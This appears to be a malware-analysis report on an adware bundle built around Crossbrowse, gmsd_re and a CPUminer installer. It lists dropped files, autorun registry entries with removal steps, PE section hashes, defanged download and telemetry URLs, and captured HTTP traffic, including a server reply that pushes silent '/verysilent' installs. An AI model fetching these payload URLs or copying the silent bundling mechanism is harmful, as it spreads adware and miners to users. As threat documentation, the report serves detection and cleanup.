%WinDir%\Tasks\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.job (1668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nfl.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_translate.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\etsy.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ikea.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\imdb.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\imdb.ico (2993 bytes)
%WinDir%\Tasks\Crossbrowse.job (1982 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_search.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\booking.com.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nba.ico (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\huffingtonpost.ico (1909 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\9gag.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\netflix.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\chrome.dat (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_news.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\target.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\pinterest.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\cnn.ico (45 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yandex.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\cnn.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\hotels.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nfl.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\amazon.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\search.ico (57 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\espn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_news.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\priceline.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail_live_msn.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ted.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yelp.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\utility.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\tumblr.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\expedia.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bbc.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\groupom.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\netflix.ico (51 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\twitter.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\kayak.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\chrome.packed.7z (1402273 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tripadvisor.ico (58 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\kayak.com.ico (47 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\agoda.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail_live_msn.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bbc.ico (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\weather_channel.ico (5593 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\search.ico (1917 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\forbes.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\msn.ico (36 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo.ico (39 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].002 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].003 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\A56681B7-BD04-4C06-AEBF-AC8A28A2118A\A56681B7-BD04-4C06-AEBF-AC8A28A2118A.exe (14022 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].001 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\mail.ru.ico (1909 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\youtube.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].004 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ie.zip[1].005 (3959285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\msn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\crbrw.zip (306422 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\linkedin.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gmail.ico (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\reddit.ico (1917 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\facebook.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yelp.ico (1597 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\9gag.ico (56 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\target.ico (50 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\theguardian.ico (42 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_finance.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\theguardian.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo_mail.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\nytimes.ico (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\amazon.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\gizmodo.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\wikipedia.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\ebay.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\mail.ru.ico (49 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\walmart.ico (48 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\icon.json (9 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\google_translate.ico (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\etsy.ico (3913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_search.ico (601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\ebay.ico (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\wikipedia.ico (1913 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\priceline.ico (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nba.ico (1601 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\bestbuy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gizmodo.ico (2993 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\yahoo_mail.ico (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bestbuy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yandex.ico (1588 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\forbes.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\yahoo.ico (1592 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\huffingtonpost.ico (49 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\tumblr.ico (40 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\reddit.ico (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\google_plus.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\nytimes.ico (1921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\hotels.com.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\icon.json (21 bytes)
%Program Files%\Crossbrowse\Crossbrowse\Application\Icons\booking.com.ico (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3496\Icons\bing.ico (1597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjE.tmp (7695 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa3B.tmp (43 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3A.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\0[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu39.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm25.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm26.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Bundle_CPUminer[1].exe (7288 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010077.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010077\upgmsd_re_005010077.exe -runhelper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010077" = "%Program Files%\gmsd_re_005010077\gmsd_re_005010077.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.0.1
Legal Copyright: Copyright 2013
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.1
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: 1.0.0.1Legal Copyright: Copyright 2013Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.1File Description: Comments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23130 | 23552 | 4.44841 | 0bc2ffd32265a08d72b795b18265828d |
.rdata | 28672 | 4496 | 4608 | 3.59163 | f179218a059068529bdb4637ef5fa28e |
.data | 36864 | 110488 | 1024 | 3.26405 | 975304d6dd6c4a4f076b15511e2bbbc0 |
.ndata | 147456 | 8056832 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 8204288 | 17160 | 17408 | 4.10885 | 41d461b626b10abd2322eb8721b1a8ac |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 7
a5330d468717116f74e3f10c4af44ac9
19386547989c454126fa40838fe498c5
8c262eb3013302226c8ae0164083f66c
ec93fc5c36e02c2138ee1f10ff7fd9ce
f3b2b530c415d7c461ffcfbd3407a605
a66e913a6195f712096c14d0f1eef2df
2623f1cff9f274c62e3fb51d09f6d201
Network Activity
URLs
URL | IP |
---|---|
hxxp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com/ | 54.235.132.107 |
hxxp://download-servers.com/SysInfo/Validate.exe | 95.211.210.34 |
hxxp://download-servers.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 95.211.210.34 |
hxxp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe | 54.239.168.38 |
hxxp://download-servers.com/SysInfo/validator/timer.php | 95.211.210.34 |
hxxp://cds.c5z6s5a3.hwcdn.net/69/all/cp/row/setup.exe | |
hxxp://ipgeoapi.com/ | 54.225.198.126 |
hxxp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe | 54.239.168.31 |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=3&rnd=3075 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=106&crtnm=OralTeams&rnd=2620 | |
hxxp://cds.r5q6q4j7.hwcdn.net/OperaRUnew/Bundle_OperaRUnew.exe | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=5890 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=8163 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=6404 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.004 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.001 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.003 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.002 | |
hxxp://cds.c5z6s5a3.hwcdn.net/crossbrowse/ie/106/ie.zip.005 | |
hxxp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe | 54.239.168.88 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1711 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=1250 | |
hxxp://cds.r5q6q4j7.hwcdn.net/CPUminer/Bundle_CPUminer.exe | |
hxxp://dl.tuto4pc.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | |
hxxp://ils-front-balancer3-264552681.us-east-1.elb.amazonaws.com/thankyou.php | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi?checking=true&version=gmsd_us_233&forceGEO=US | 37.187.146.35 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_INI | 94.23.40.227 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=3154 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=6008 | |
hxxp://cds.c5z6s5a3.hwcdn.net/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=4&rnd=6761 | |
hxxp://prof.eorezo.com/cgi-bin/get_protect.cgi | 37.187.146.35 |
hxxp://ads.under-myscreen.be/cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc | 188.165.216.144 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_F11 | 94.23.40.227 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_FIN | 94.23.40.227 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_COUNT1 | 94.23.40.227 |
hxxp://ads.regiedepub.com/cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_DCOUNT1 | 94.23.40.227 |
hxxp://s3-website-us-east-1.amazonaws.com/setup_362.exe | |
hxxp://djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 | |
hxxp://d22nes4susdva1.cloudfront.net/finalinstaller/24.08.2015/FinalInstaller_dotnet4.exe | 54.239.168.192 |
hxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPXN0YXJ0byZldmVudD0xJnNpZD02NjYmbWFjPTc3Nw== | |
hxxp://installer.afsbdfgds.net/installer.php?id=800&env=2&setup_version=42.4&srcid=&dbb=ZHNwdHRjc3B4dGY=&pub_id=362&os=5.1&dotnet=4 | |
hxxp://bi.afsbdfgds.net/?pageNumber=0&event=document_ready&description=window_of_setup_loaded&pub_id=362&setup_id=800 | |
hxxp://bi.afsbdfgds.net/?pageNumber=1&event=window_close&description=user_clicked_close_button&pub_id=362&setup_id=800 | |
hxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPWZpbml0byZldmVudD03JnNpZD02NjYmbWFjPTc3Nw== | |
hxxp://bi.afsbdfgds.net/?setup_closed&ReportAdvPath&adv_path=&pub_id=362&setup_id=800 | |
hxxp://d10huri5h4o4a3.cloudfront.net/policyname.exe | 54.239.168.124 |
hxxp://sstatic1.histats.com/0.gif?2948573&101&101 | 208.43.241.179 |
hxxp://codec13sudha.com/download.php?l4J9dw== | |
hxxp://cds.c5z6s5a3.hwcdn.net/VuuPC_VO2_8907.exe | |
hxxp://fcesneim.us/FCL_Co_Unq_remote_v5.php | |
hxxp://fcesneim.us/DSS_Unq_IMapplication_mon_remote.php | |
hxxp://cds.c5z6s5a3.hwcdn.net/os/rm/OfferScreen_12_HD_v2.zip | |
hxxp://cds.c5z6s5a3.hwcdn.net/os/rm/OfferScreen_460_v2.zip | |
hxxp://www.codec13sudha.com/download.php?l4J9dw== | 50.97.234.3 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=0beb334165382025853a9a860db0b131&rnd=3154 | 54.231.81.122 |
hxxp://events.afsbdfgds.nethxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPWZpbml0byZldmVudD03JnNpZD02NjYmbWFjPTc3Nw== | |
hxxp://www.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php | 50.97.62.154 |
hxxp://installer.afsbdfgds.nethxxp://installer.afsbdfgds.net/installer.php?id=800&env=2&setup_version=42.4&srcid=&dbb=ZHNwdHRjc3B4dGY=&pub_id=362&os=5.1&dotnet=4 | |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.002 | 69.16.175.42 |
hxxp://bi.afsbdfgds.nethxxp://bi.afsbdfgds.net/?pageNumber=0&event=document_ready&description=window_of_setup_loaded&pub_id=362&setup_id=800 | |
hxxp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip | 69.16.175.10 |
hxxp://mystats.rgbdomsrv.com/installer.gif?action=started&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=106&crtnm=OralTeams&rnd=2620 | 54.231.97.210 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.005 | 69.16.175.42 |
hxxp://livestatscounter.com/SysInfo/validator/timer.php | 50.7.133.50 |
hxxp://www.software-forus.com/CPUminer/Bundle_CPUminer.exe | 205.185.216.10 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.003 | 69.16.175.42 |
hxxp://www.fcesneim.us/FCL_Co_Unq_remote_v5.php | 50.97.62.154 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.004 | 69.16.175.42 |
hxxp://bi.afsbdfgds.nethxxp://bi.afsbdfgds.net/?pageNumber=1&event=window_close&description=user_clicked_close_button&pub_id=362&setup_id=800 | |
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= | 50.7.133.50 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=0beb334165382025853a9a860db0b131&rnd=1250 | 54.231.81.122 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=0beb334165382025853a9a860db0b131&rnd=6008 | 54.231.81.122 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=4&rnd=6761 | 69.16.175.42 |
hxxp://events.afsbdfgds.nethxxp://events.afsbdfgds.net/?p=cHViX2lkPTM2MiZzZXR1cF9pZD04MDAmZXh0cmFfcGFyYW1zPXN0YXJ0byZldmVudD0xJnNpZD02NjYmbWFjPTc3Nw== | |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=270&n=install_browser_all_thread_created_success&ibic=0beb334165382025853a9a860db0b131&rnd=6404 | 54.231.81.122 |
hxxp://zip.rgbdomsrv.com/crossbrowse/ie/106/ie.zip.001 | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=310&n=install_browser_all_thread_ended_success&ibic=0beb334165382025853a9a860db0b131&rnd=1711 | 54.231.81.122 |
hxxp://prof.youandmeandmeandyouhihi.com/cgi-bin/get_protect.cgi | 37.187.148.125 |
hxxp://secured.nmsgv.us/VuuPC_VO2_8907.exe | 69.16.175.10 |
hxxp://www.djapp.info/?domain=afsbdfgds.net&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=362&setup_id=800 | 52.1.45.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=250&n=install_browser_downloading&ibic=0beb334165382025853a9a860db0b131&rnd=8163 | 54.231.81.122 |
hxxp://www.software-forus.com/OperaRUnew/Bundle_OperaRUnew.exe | 205.185.216.10 |
hxxp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe | 54.231.9.20 |
hxxp://www.downloadsoup.com/thankyou.php | 54.243.139.119 |
hxxp://logs.rgbdomsrv.com/data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=3&rnd=3075 | 69.16.175.42 |
hxxp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe | 176.31.126.133 |
hxxp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip | 69.16.175.10 |
hxxp://dl.staticclientstorage.com/69/all/cp/row/setup.exe | 69.16.175.42 |
hxxp://err.rgbdomsrv.com/utility.gif?report=fdata&f=4&c=003266&i=100&n=install_browser_start_async&ibic=0beb334165382025853a9a860db0b131&rnd=5890 | 54.231.81.122 |
s3.amazonaws.com | 54.231.14.104 |
upd.adskyforever.com | 37.187.148.115 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /DSS_Unq_IMapplication_mon_remote.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 327
Connection: Keep-Alive
Cache-Control: no-cache
from=nsis&type=Reg&mode=checker&utid=194.242.96.218_2015-09-02_02:40:01&pubid=11355&CbId=8907&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mukeZvxnJUBzZDYiT/aeDKox&DB="%Program Files%\Crossbrowse\Crossbrowse\Application\crossbrowse.exe" -- "%1"&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/460~YES~0/575~NO~4/576~NO~4/
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:40:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 599
Connection: close
Content-Type: text/html; charset=UTF-8
460~hXXp://secured.nmsgv.us/os/rm/OfferScreen_460_v2.zip~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~hXXp://dl.lockmaprack.com/monti/llyun/ssup/setup.exe~null~0~0~0#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD_v2.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..460#RE2|InstalledBrowserExtensions\32846#PKG|NO#INT|setup.exe..12#RE2|Systweak\RegClean Pro\Version 6.1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXp://dl.ourinputinfonet.com/monti/llyun/hd/setup.exe#PKG|NO#INT|rcpsetup_17970.exe..
GET /cgi-bin/advert/getkws.cgi?did=90068&version=0&key=azJJ.s8MVPsHc HTTP/1.1
User-Agent: gmsd_re_005010077-1.20
Host: ads.under-myscreen.be
Accept: */*
Accept-Encoding: gzip, deflate
Referer:
Cookie:
Accept-Language: en,en-US
X-Guuid: 75ed9567-aa58-4c8e-a8ea-3cad7c47ab03
X-OS-Ver: 5.1.2.2600
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:43 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_perl/2.0.4 Perl/v5.10.1
X-C4PC-ServerName: ads.under-myscreen.be
Set-Cookie: _c4aid=75ED9567AA584C8EA8EA3CAD7C47AB03; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=under-myscreen.be; path=/;
Set-Cookie: _c4aid2=75ED9567AA584C8EA8EA3CAD7C47AB03,1441175983.6129; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=under-myscreen.be; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
1f1..{"dids":{"90077":{"unmatch":["regiedepub.com|under-myscreen.be|eorezo.com|regiedepub.com"],"match":[{"u":0,"m":"xvideos|imbd|instagram|netflix|craigslist|kickass|td|thepiratebay"},{"u":0,"m":"yahoo|live|wikipedia|bing|msn|amazon|tumblr|royalbank|reddit|ebay"},{"u":0,"m":"http|fa|go|yah|hot|twit|blog|msn|apple|facebook|google|twitter|youtube"},{"u":0,"m":"xhamster"},{"u":0,"m":"pinterest|apple|ask|microsoft|bmo|wordpress|cibc|paypal|baidu|cbc"}]}},"freeze":3600,"refresh":3600,"version":116144}..0..
GET /crossbrowse/ie/106/ie.zip.002 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:16 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
